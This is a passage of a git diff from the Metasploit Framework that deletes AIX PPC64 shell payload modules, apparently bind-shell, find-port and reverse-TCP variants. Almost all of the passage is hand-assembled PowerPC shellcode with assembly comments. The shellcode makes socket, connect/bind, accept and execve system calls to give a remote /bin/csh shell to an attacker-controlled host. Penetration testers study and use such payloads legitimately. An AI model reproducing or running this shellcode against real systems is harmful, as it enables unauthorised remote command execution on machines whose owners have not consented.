"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) # - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "\x4c\xc6\x33\x42" +# crorc 6,6,6 # - "\x44\xff\xff\x02" +# svca 0 # - "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # - "\x3b\xa0\x01\xff" +# lil r29,511 # - "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # - "\x38\x9d\xfe\x02" +# cal r4,-510(r29) # - "\x38\x7d\xfe\x03" +# cal r3,-509(r29) # - cal_socket + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7c\x1b\x78" +# mr r28,r3 # - "\x38\xbd\xfe\x11" +# cal r5,-495(r29) # - "\x3f\x60\xff\x02" +# liu r27,-254 # - "\x63\x7b\x04\xd2" +# oril r27,r27,1234 # - "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # - "\x97\x61\xff\xfc" +# stu r27,-4(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_bind + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_listen + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_accept + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7a\x1b\x78" +# mr r26,r3 # - "\x3b\x3d\xfe\x03" +# cal r25,-509(r29) # - "\x7f\x23\xcb\x78" +# mr r3,r25 # - cal_close + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7f\x25\xcb\x78" +# mr r5,r25 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x43\xd3\x78" +# mr r3,r26 # - cal_kfcntl + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x37\x39\xff\xff" +# ai. r25,r25,-1 # - "\x40\x80\xff\xd4" +# bge # - "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\x08\x02\xa6" +# mflr r24 # - "\x3b\x18\x01\xff" +# cal r24,511(r24) # - "\x38\x78\xfe\x29" +# cal r3,-471(r24) # - "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # - "\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) # - "\xf8\x61\xff\xf9" +# stdu r3,-8(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "/bin/csh" - - end - -end diff --git a/modules/payloads/singles/aix/ppc64/shell_find_port.rb b/modules/payloads/singles/aix/ppc64/shell_find_port.rb deleted file mode 100644 index fc44ddaecf..0000000000 --- a/modules/payloads/singles/aix/ppc64/shell_find_port.rb +++ /dev/null @@ -1,115 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' -require 'msf/core/handler/find_port' -require 'msf/base/sessions/command_shell' - - -module Metasploit3 - - include Msf::Payload::Single - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'AIX Command Shell, Find Port Inline', - 'Version' => '$Revision$', - 'Description' => 'Spawn a shell on an established connection', - 'Author' => 'Ramon de Carvalho Valle ', - 'License' => MSF_LICENSE, - 'Platform' => 'aix', - 'Arch' => ARCH_PPC64, - 'Handler' => Msf::Handler::FindPort, - 'Session' => Msf::Sessions::CommandShell, - 'Payload' => - { - 'Offsets' => - { - 'CPORT' => [ 106, 'n' ], - }, - } - )) - - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) - end - - def generate - case datastore['AIXLEVEL'] - when '5.3.0' - cal_getpeername = "\x38\x5d\xfe\x7b" # cal r2,-389(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end - - payload = - "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\xc8\x02\xa6" +# mflr r30 # - "\x3b\xde\x01\xff" +# cal r30,511(r30) # - "\x3b\xde\xfe\x1d" +# cal r30,-483(r30) # - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "\x4c\xc6\x33\x42" +# crorc 6,6,6 # - "\x44\xff\xff\x02" +# svca 0 # - "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # - "\x3b\xa0\x01\xff" +# lil r29,511 # - "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # - "\x7c\x3c\x0b\x78" +# mr r28,r1 # - "\x3b\x7d\xfe\x2d" +# cal r27,-467(r29) # - "\x97\x61\xff\xfc" +# stu r27,-4(r1) # - "\x7c\x3b\x0b\x78" +# mr r27,r1 # - "\x3b\xff\x01\xff" +# cal r31,511(r31) # - "\x3b\xff\xfe\x02" +# cal r31,-510(r31) # - "\x7f\x65\xdb\x78" +# mr r5,r27 # - "\x7f\x84\xe3\x78" +# mr r4,r28 # - "\x7f\xe3\xfb\x78" +# mr r3,r31 # - cal_getpeername + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x3b\x5c\x01\xff" +# cal r26,511(r28) # - "\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) # - "\x28\x1a\x04\xd2" +# cmpli 0,r26,1234 # - "\x40\x82\xff\xd4" +# bne # - "\x3b\x3d\xfe\x03" +# cal r25,-509(r29) # - "\x7f\x23\xcb\x78" +# mr r3,r25 # - cal_close + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7f\x25\xcb\x78" +# mr r5,r25 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\xe3\xfb\x78" +# mr r3,r31 # - cal_kfcntl + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x37\x39\xff\xff" +# ai. r25,r25,-1 # - "\x40\x80\xff\xd4" +# bge # - "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\x08\x02\xa6" +# mflr r24 # - "\x3b\x18\x01\xff" +# cal r24,511(r24) # - "\x38\x78\xfe\x29" +# cal r3,-471(r24) # - "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # - "\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) # - "\xf8\x61\xff\xf9" +# stdu r3,-8(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "/bin/csh" - - end - -end diff --git a/modules/payloads/singles/aix/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc64/shell_reverse_tcp.rb deleted file mode 100644 index b36f77e55a..0000000000 --- a/modules/payloads/singles/aix/ppc64/shell_reverse_tcp.rb +++ /dev/null @@ -1,113 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' -require 'msf/core/handler/reverse_tcp' -require 'msf/base/sessions/command_shell' - - -module Metasploit3 - - include Msf::Payload::Single - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'AIX Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', - 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => 'Ramon de Carvalho Valle ', - 'License' => MSF_LICENSE, - 'Platform' => 'aix', - 'Arch' => ARCH_PPC64, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::CommandShell, - 'Payload' => - { - 'Offsets' => - { - 'LHOST' => [ 32, 'ADDR' ], - 'LPORT' => [ 30, 'n' ], - }, - } - )) - - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) - end - - def generate - case datastore['AIXLEVEL'] - when '5.3.0' - cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) # - cal_connect = "\x38\x5d\xfe\x8f" # cal r2,-369(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end - - payload = - "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\xc8\x02\xa6" +# mflr r30 # - "\x3b\xde\x01\xff" +# cal r30,511(r30) # - "\x3b\xde\xfe\x25" +# cal r30,-475(r30) # - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "\xff\x02\x04\xd2" +# .long 0xff0204d2 # - "\x7f\x00\x00\x01" +# .long 0x7f000001 # - "\x4c\xc6\x33\x42" +# crorc 6,6,6 # - "\x44\xff\xff\x02" +# svca 0 # - "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # - "\x3b\xa0\x01\xff" +# lil r29,511 # - "\x38\x9d\xfe\x02" +# cal r4,-510(r29) # - "\x38\x7d\xfe\x03" +# cal r3,-509(r29) # - cal_socket + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7c\x1b\x78" +# mr r28,r3 # - "\x38\xbd\xfe\x11" +# cal r5,-495(r29) # - "\x38\x9e\xff\xf8" +# cal r4,-8(r30) # - cal_connect + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x3b\x7d\xfe\x03" +# cal r27,-509(r29) # - "\x7f\x63\xdb\x78" +# mr r3,r27 # - cal_close + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7f\x65\xdb\x78" +# mr r5,r27 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_kfcntl + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x37\x7b\xff\xff" +# ai. r27,r27,-1 # - "\x40\x80\xff\xd4" +# bge # - "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\x08\x02\xa6" +# mflr r24 # - "\x3b\x18\x01\xff" +# cal r24,511(r24) # - "\x38\x78\xfe\x29" +# cal r3,-471(r24) # - "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # - "\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) # - "\xf8\x61\xff\xf9" +# stdu r3,-8(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "/bin/csh" - - end - -end